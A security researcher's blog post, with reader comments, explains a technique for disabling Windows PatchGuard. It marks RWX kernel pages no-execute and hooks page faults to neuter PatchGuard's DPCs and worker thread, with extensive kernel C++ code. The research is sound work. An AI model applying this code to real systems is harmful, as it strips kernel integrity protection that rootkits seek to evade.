PgC: Garbage collecting Patchguard away

I released an article about Patchguard almost 5 years ago, ByePg, which was about exception hooking in the kernel; but let's be frank, it didn't entirely get rid of Patchguard. In this article I will be discussing an entirely different approach to bypassing Patchguard: PgC.

Now, there is already plenty of great research on Patchguard; Tetrane even released a 61-page whitepaper on all of its intricacies. What makes PgC different is that it does not depend on how Patchguard works at all, only on some very obvious principles of memory management. The advantage of this approach is that it does not defeat a specific version of Patchguard, but rather the entire concept of it. I'll admit I have been sitting on this for a while, but I think it is now time to share it with the world, after almost 7 years during which I only had to change a single line of code to keep it working (hi, KiSwInterruptDispatch 👋).

0x0: A stark contrast

There is only one thing we need to know about Patchguard in order to come up with an idea to defeat it: it runs on non-image pages and it decrypts itself on the fly.

Just by knowing this, you should see where this is going once you recall that the Windows kernel, like any other modern operating system, absolutely hates the idea of RWX memory in Ring 0! It is a security nightmare after all, and Microsoft will not sign your driver if it has RWX sections in it. A case of do as I say, not as I do; interesting!

0x1: System VA types

Before we start engineering a solution to attack this very contrast, there is one more thing we should know about our beloved OS: how it likes to keep its memory arranged. Let's play a little game. Go ahead and launch Process Hacker, or any other tool that shows you the image base of a kernel driver, pick a (non-session) driver and check its image base. Does it start with something close to 0xfffff803?
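
If you'd rather automate the party trick, here's a minimal user-mode sketch (using the documented EnumDeviceDrivers API from psapi; the index math assumes 4-level paging) that prints each driver's image base next to its top-level page table index:

// User-mode sketch: print every loaded driver's image base together with
// its top-level page table index (PXI, bits 39..47 of the address).
// Link against psapi.lib; run elevated so the kernel addresses are real.
#include <windows.h>
#include <psapi.h>
#include <cstdint>
#include <cstdio>

int main() {
	LPVOID bases[ 1024 ];
	DWORD needed = 0;
	if ( !EnumDeviceDrivers( bases, sizeof( bases ), &needed ) )
		return 1;
	for ( DWORD i = 0; i != needed / sizeof( LPVOID ); i++ ) {
		uint64_t va = ( uint64_t ) bases[ i ];
		printf( "%p -> PXI 0x%llx\n", bases[ i ], ( va >> 39 ) & 0x1ff );
	}
	return 0;
}

You should see every non-session driver land in the same handful of indices.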

Admittedly, this was not the best party trick, but the point of it all is that the kernel manages each “type” of memory in different PXIs (PML4/PML5 indices). You can get an idea of how this all works by looking at the enum _MI_SYSTEM_VA_TYPE; within MiVisibleState there is a neat little array called SystemVaType, mapping the upper 256 PXIs to a specific type of memory. This means that when you allocate a page, where it ends up isn't really random, even if it is somewhat randomized each boot.

To give you an idea of each region of memory, here’s a snippet of the enum:

namespace mi
{
    // [enum _MI_SYSTEM_VA_TYPE]
    //  Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
    //
    enum class system_va_type_t : int32_t       
    {                                           
        unused =                        0x0,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        session_space =                 0x1,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        process_space =                 0x2,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        boot_loaded =                   0x3,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        pfn_database =                  0x4,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        non_paged_pool =                0x5,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        paged_pool =                    0x6,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        special_pool_paged =            0x7,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        system_cache =                  0x8,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        system_ptes =                   0x9,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        hal =                           0xa,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        formerly_session_global_space = 0xb,      // Windows 11
        session_global_space =          0xb,      // Windows 10 v1607, Windows 10 v2004, Windows 10 v20H2
        driver_images =                 0xc,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
        special_pool_non_paged =        0xd,      // Windows 10 v1607
        system_ptes_large =             0xd,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        kernel_stacks =                 0xe,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        //maximum_type =                0xe,      // Windows 10 v1607
        secure_non_paged_pool =         0xf,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
        //system_ptes_large =           0xf,      // Windows 10 v1607
        kernel_shadow_stacks =          0x10,     // Windows 11
        maximum_type =                  0x10,     // Windows 10 v2004, Windows 10 v20H2
        kasan =                         0x11,     // Windows 11
        //maximum_type =                0x12,     // Windows 11
    };                                          
};              
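
To make the mapping concrete, here is a hedged sketch of the lookup itself; system_va_type stands in for the 256-entry byte array inside MiVisibleState (how you locate MiVisibleState, e.g. via symbols, is out of scope here), and the index math again assumes 4-level paging:

// Sketch: classify a kernel VA by its top-level index, assuming
// system_va_type points at the SystemVaType array covering the upper
// (kernel) 256 PXIs, one byte per index.
mi::system_va_type_t classify_va( const uint8_t* system_va_type, uint64_t va )
{
	size_t pxi = ( va >> 39 ) & 0x1ff;        // PML4 index, bits 39..47.
	if ( pxi < 256 )
		return mi::system_va_type_t::unused;  // User-mode half.
	return ( mi::system_va_type_t ) system_va_type[ pxi - 256 ];
}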

What this means is that, if we exclude the pages that are used for actual kernel images and filter for RWX memory, what we end up with is a very small subset of allocations: most likely either Patchguard or some rootkit you sadly have on your system.

0x2: GC

Big corporations might not like the fact that you really have the same privileges as their OS on your own machine, but (for the next few years at least) you do. So let's just do a little garbage collection of our own and mark these pages no-execute.

scheduler::call_ipi( [ & ] ( auto barrier ) {
	barrier->up();

	// Determine the range we scan.
	//
	auto [range_min, range_max] = get_range( range_per_cpu );

	// Iterate all top level page table entries in kernel address space.
	//
	for ( size_t ipxe = 256; ipxe != 512; ipxe++ ) {
		// If ignored region, skip.
		//
		if ( mem::get_pxi_flags( ipxe ) & ignored_pxi_flags )
			continue;

		auto rec = [ & ] <auto N> ( auto&& self, uint64_t va, const_tag<N>, size_t imin, size_t imax )
		{
			auto pte = mem::get_pte( va, N );

			// Skip if not present.
			//
			if ( !pte->present )
				return;
			
			// If we did not reach the bottom level:
			//
			if constexpr ( N != 0 ) {
				// If directory:
				//
				if ( !pte->large_page ) {
					// Iterate all pt entries:
					//
					for ( size_t ipte = imin; ipte != imax; ipte++ )
						self( self, va | ( ipte << ( 12 + 9 * ( N - 1 ) ) ), const_tag<N - 1>{}, 0, 512 );
					return;
				}
				// If large page, skip if too large to be considered.
				//
				else if constexpr ( N > 1 ) {
					return;
				}
				// Fallthrough to page handling.
			}

			// Skip if not RWX.
			//
			if ( !pte->write || pte->execute_disable )
				return;

			// Skip if user-mode memory mapped to kernel.
			//
			if ( !is_kernel_va( mem::get_virtual_address( pte->page_frame_number << 12 ), true ) )
				return;

			// Disable execution.
			//
			atomic_bit_set( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
		};
		rec( rec, mem::make_cannonical( ipxe << ( mem::va_bits - 9 ) ), const_tag<mem::page_table_depth - 1>{}, range_min, range_max );
	}

	// Flush the TLB and return.
	//
	barrier->down();
	ia32::flush_tlb();
} );

This code more or less comes down to:

  1. Launch an IPI since we don’t want to race with the rest of the OS.
  2. Iterate all the kernel pages (indices 0x100 to 0x1ff).
  3. Skip the ones that could not contain Patchguard; I'd recommend skipping SessionSpace, ProcessSpace, DriverImages, PagedPool and, most importantly, the self-referencing index, unless you want to triple fault (a sketch for locating it follows this list).
  4. Skip the pages that are already no-execute, write-disabled, or not present.
  5. Go ahead and flip the NX bit.
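
As for the self-referencing index: through that entry the page tables map themselves, so anything the walk finds there is really a PML4E/PDPTE/PDE, and setting bit 63 on those turns entire translation hierarchies non-executable, kernel code included. Here's a hedged sketch of locating it, assuming pml4 is a virtual mapping of the current PML4 and pml4_pfn is its own page frame number (both recoverable from CR3):

// Sketch: find the self-referencing PML4 index by looking for the entry
// whose target frame is the PML4's own physical page. Assumes 4-level
// paging; on Windows the self-reference lives in the kernel half.
size_t find_self_ref_pxi( const uint64_t* pml4, uint64_t pml4_pfn )
{
	for ( size_t ipxe = 256; ipxe != 512; ipxe++ ) {
		bool present = pml4[ ipxe ] & 1;
		uint64_t pfn = ( pml4[ ipxe ] >> 12 ) & 0xFFFFFFFFFFull;
		if ( present && pfn == pml4_pfn )
			return ipxe;
	}
	return SIZE_MAX;
}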

If this all goes right, you will bluescreen in two to three minutes, which is when Patchguard would have decrypted itself and tried to run: ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (bugcheck 0xFC). Hurray?

0x3: Healing our OS back

We now need a hook on #PF. Remember, there is no Patchguard anymore, so our job is very straightforward. You can switch the IDT and add your own page fault handler, inline hook MmAccessFault, whichever method you'd like, as long as you do it quickly and right before our IPI.
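
For the IDT route, here's a hedged sketch; the gate layout follows the x64 interrupt gate format from the Intel SDM, and pgc_pf_isr is a hypothetical assembly stub that builds a trap frame, calls on_knx_fault, and chains to the saved original handler otherwise:

// Sketch: swap the #PF gate (vector 0xE) in the current CPU's IDT.
// Run once per CPU with interrupts disabled; not a production hook.
#pragma pack( push, 1 )
struct idtr_t { uint16_t limit; uint64_t base; };
struct idt_entry_t {
	uint16_t offset_low;
	uint16_t selector;
	uint16_t flags;          // IST index + type/attributes.
	uint16_t offset_mid;
	uint32_t offset_high;
	uint32_t reserved;
};
#pragma pack( pop )

extern "C" void pgc_pf_isr();             // Hypothetical asm stub.
inline uint64_t original_pf_handler = 0;  // Chained to by the stub.

void hook_page_fault() {
	idtr_t idtr;
	__sidt( &idtr );                      // MSVC intrinsic, reads IDTR.
	auto* entry = ( idt_entry_t* ) idtr.base + 0xE;
	original_pf_handler = entry->offset_low
		| ( uint64_t ) entry->offset_mid  << 16
		| ( uint64_t ) entry->offset_high << 32;
	uint64_t isr = ( uint64_t ) &pgc_pf_isr;
	entry->offset_low  = ( uint16_t ) isr;
	entry->offset_mid  = ( uint16_t ) ( isr >> 16 );
	entry->offset_high = ( uint32_t ) ( isr >> 32 );
}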

The final step, even with zero prior knowledge of how Patchguard works, is surprisingly simple: just let it bluescreen a few times and look at the dump! You will notice that there are a few DPCs, all of which start with an XOR instruction, and a worker at PASSIVE_LEVEL. The worker we will suspend forever; the DPCs will simply return to whoever called them without doing anything.

That was pretty much it. The entire source code comes down to roughly 200 lines, and there is no more Patchguard.

static constexpr bool pgc_debug = is_debug_build() && true;
static constexpr bool pgc_disable_timer_dispatch = true;
static constexpr bool pgc_disable_dpc_dispatch =   true;
static constexpr bool pgc_disable_context_dpc =    true;
static constexpr auto ignored_pxi_flags = mem::va_image | mem::va_session | mem::va_process | mem::va_self_ref | mem::va_paged;
inline static bool is_va_ignored( any_ptr virtual_address ) { return mem::lookup_va_flags( virtual_address ) & ignored_pxi_flags; }

// The ISR handling Kernel-mode NX faults:
bool on_knx_fault( void* virtual_address, nt::trapframe* tf ) {
	// If ignored region, skip.
	//
	if ( is_va_ignored( virtual_address ) )
		return false;

	// Get IRQL, display details.
	//
	auto* stack = ( void** ) ( tf->rsp & ~7ull );
	irql_t irql = ia32::get_effective_irql( tf->rflags );
	if constexpr ( pgc_debug ) {
		log( "KNX Caught @ %p\n", tf->rip );
		log( "RSP:  %p\n", tf->rsp );
		log( "RAX:  %p\n", tf->rax );
		log( "RCX:  %p\n", tf->rcx );
		log( "RDX:  %p\n", tf->rdx );
		log( "RBX:  %p\n", tf->rbx );
		log( "RBP:  %p\n", tf->rbp );
		log( "R8:   %p\n", tf->r8 );
		log( "R9:   %p\n", tf->r9 );
		log( "R10:  %p\n", tf->r10 );
		log( "R11:  %p\n", tf->r11 );
		log( "IRQL: %d\n", irql );
		for ( uint64_t p = tf->rip; p < ( tf->rip + 32 ); ) {
			if ( !mem::is_address_valid( p ) || !mem::is_address_valid( p + 15 ) ) {
				break;
			}
			auto ins = xed::decode64( ( void* ) p );
			if ( !ins ) break;
			log( "%p: %s\n", p, ins->to_string() );
			p += ins->length();
		}
	}

	// Dispatch level or IPI level PatchGuard components:
	//
	if ( irql >= DISPATCH_LEVEL ) {
		uint8_t* bytes = ( uint8_t* ) tf->rip;

		// KiDpcDispatch/CmpAppendDllSection clone called from dummy DPCs, decrypts and calls into pg context.
		//
		if ( pgc_disable_context_dpc && !memcmp( bytes, "\x2E\x48\x31", 3 ) ) {
			if ( !mem::is_cannonical( tf->rdx ) ) {
				if ( tf->rcx == tf->rip ) {
					if constexpr ( pgc_debug )
						log( "Discarded CmpAppendDllSection DPC: %llx\n", tf->rip );
					tf->rip = *( uint64_t* ) tf->rsp;
					tf->rsp += 8;
					return true;
				}
			}
		} 
		else if ( pgc_disable_dpc_dispatch && !memcmp( bytes, "\x48\x31", 2 ) ) {
			if ( !mem::is_cannonical( tf->rdx ) ) {
				if ( ( tf->rip - 0x70 ) <= tf->rcx && tf->rcx <= ( tf->rip + 0x70 ) ) {
					if constexpr ( pgc_debug )
						log( "Discarded KiDpcDispatch DPC: %llx\n", tf->rip );
					tf->rip = *( uint64_t* ) tf->rsp;
					tf->rsp += 8;
					return true;
				}
			}
		}

		// KiTimerDispatch clone called from KiExecuteAllDpcs, decrypts and calls into pg context.
		//
		if constexpr ( pgc_disable_timer_dispatch ) {
			for ( int i = 0; i < 0x20; i++ ) {
				// pushfq
				if ( bytes[ i + 0 ] == 0x48 && bytes[ i + 1 ] == 0x9C ) {
					for ( int j = i; j < 0x20; j++ ) {
						// sub rsp
						if ( bytes[ j + 0 ] == 0x48 && bytes[ j + 1 ] == 0x83 ) {
							if constexpr ( pgc_debug )
								log( "Discarded KiTimerDispatch: %llx\n", tf->rip );
							tf->rip = *( uint64_t* ) tf->rsp;
							tf->rsp += 8;
							return true;
						}
					}
				}
			}
		}
	} else if ( ke::get_eprocess() == ntpp::get_initial_system_process() ) {
		// Deferred work item?
		//
		uint64_t last_valid_vpn = 0;
		for ( int i = 0; i < 0x20; i++ ) {
			// Validate stack pointer.
			//
			auto* value_ptr = &stack[ i ];
			if ( auto vpn = uint64_t( value_ptr ) >> 12; vpn != last_valid_vpn ) {
				if ( !mem::is_address_valid( value_ptr ) ) {
					break;
				}
				last_valid_vpn = vpn;
			}

			// Check if it matches the value we expected.
			//
			void* value = *value_ptr;
			if ( value != &ke::delay_execution_thread && value != &ke::wait_for_multiple_objects && value != &ke::wait_for_single_object ) {
				continue;
			}

			// Align stack
			tf->rsp &= ~0xF;
			// Set the arguments on stack
			tf->rcx = ( uint64_t ) nt::mode_t::kernel_mode;
			tf->rdx = false;
			*( int64_t* ) ( tf->r8 = ( tf->rsp + 0x28 ) ) = -0x11F0231A4F3000;
			// Simulate call [KeDelayExecutionThread]
			tf->rsp -= 8;
			*( uint64_t* ) tf->rsp = tf->rip;
			tf->rip = ( uint64_t ) &ke::delay_execution_thread;
		
			// Lower IRQL and return.
			//
			if constexpr ( pgc_debug )
				log( "Suspended PatchGuard worker thread: %llx\n", ntpp::get_client_id().unique_thread );
			ia32::set_irql( APC_LEVEL );
			tf->rflags.interrupt_enable_flag = true;
			return true;
		}
	}

	// False positive, fix NX and continue.
	//
	auto [pte, _] = mem::lookup_pte( virtual_address );
	atomic_bit_reset( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
	return true;
}


// Initializes the patchguard bypass.
//
void init() {
	// Fetch the number of processors and distribute the work.
	//
	static const uint16_t num_processors = ( uint16_t ) apic::number_of_processors();
	static const uint16_t range_per_cpu = 512 / num_processors;
	static constexpr auto get_range = [ ] ( uint16_t range_per_cpu ) -> std::pair<uint16_t, uint16_t> {
		// [ idx*R, (idx+1)*R ]
		uint16_t rmin = uint16_t( ia32::read_pcid() ) * range_per_cpu;
		uint16_t rmax = rmin + range_per_cpu;
		
		// If last range, round to max.
		if ( ( rmax + range_per_cpu ) >= 512 )
			rmax = 512;
		
		return { rmin, rmax };
	};
	
	// Add the patches and call the IPI.
	//
	if ( sdk::exists( ki::sw_interrupt_dispatch ) )
		hook::patch( &ki::sw_interrupt_dispatch, { 0xC3 } );
	if ( sdk::exists( ki::mca_deferred_recovery_service ) )
		hook::patch( &ki::mca_deferred_recovery_service, { 0xC3 } );
	scheduler::call_ipi( [ & ] ( auto barrier ) {
		// .... See above
	} );
}

As it stands right now, the code base is not yet ready for release due to the vast number of dependencies on bits and pieces of my libraries (C runtime, the hooking library, ISRs…), but I will try to release a standalone version of PgC in the near future. You can find some of the memory utilities used above on GitHub.

I hope you enjoyed this article, and the trick even more. If you have any questions, feel free to ask them on the bird app or in the comments below.



Comments

  Can Bölük (post author):

    If it's a passive worker, then it's fine, as you can suspend it on return. A DPC would indeed crash, but since it only runs for ~2 ms every 5 minutes, the chance of you hitting that race window is vanishingly small, ~0.0006%.

  sasha:

    Thanks, this has been a very good read (as expected from you). I've been diving into PG recently, starting with the Tetrane paper, and, based on your code, it seems like the ways to execute PG code remain the same, 5 years after the article. I figured they would've kept tweaking it since then and invented new ways to obfuscate the execution, but I suppose MS (sort of) gave up to focus on HVCI and the like.

  Friday50:

    Hi Can Bölük,

    Can I translate and repost your article on my blog? I'll include your name and a link to the original post.

    Thanks!

  jay:

    Given that this technique is quite old and not actively used, I can discuss it more. First, enumerate the system memory regions; PG only exists in two of these areas. Then, in the IPI, hook #PF and set the NX attribute on these regions. Finally, I use emulation to simulate the code trying to execute in #PF and fake the memory accesses. In fact, PG only uses mov and xor to access memory for integrity checks, making it easy to emulate.
